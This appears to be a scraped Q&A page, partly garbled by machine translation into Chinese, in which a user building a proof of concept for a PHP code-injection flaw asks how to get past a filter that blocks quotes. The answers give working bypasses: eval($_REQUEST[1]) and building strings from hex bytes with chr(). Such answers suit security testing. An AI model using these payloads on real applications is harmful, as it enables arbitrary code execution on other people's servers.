php代码执行没有引号
I am writing a POC of a php code execution vulnerability, but i am having a filter that i can't bypass,simply i can execute any function just without using quotes " ' ` .
I tried to execute some codes like dirscan(getcwd()) and phpinfo() and it worked
but I couldn't find any function to use it for encoding and decoding numbers
to strings or any other ways to use $_REQUEST and $_SERVER vars
there is the old base64_decode but it need quotes too.
so any thoughts to execute any code i want ?
我正在写一个PHP代码执行漏洞的POC,但我有一个我无法绕过的过滤器 ,我只需要不使用引号 有旧的 所以执行任何代码的想法 我想要吗? p>
div>“'` code>就可以执行任何函数。
我尝试执行一些代码,如 dirscan(getcwd()) code>和 phpinfo() code>它工作
但是我找不到任何函数来使用它来编码和解码数字或字符串或任何其他方式来使用 $ _ REQUEST code>和 $ _ SERVER 代码> vars p>
base64_decode code>,但它也需要引号。 p>
Use a form with an input like:
<input type=text name=1>
Then the PHP script can do:
eval($_REQUEST[1]);
The following code can generate a string without using any quotes:
$array = [ 0x48, 0x45, 0x4c, 0x4c, 0x4f ];
$string = array_reduce($array, function ($a, $b) { return $a . chr($b); });
echo $string; // Prints "HELLO"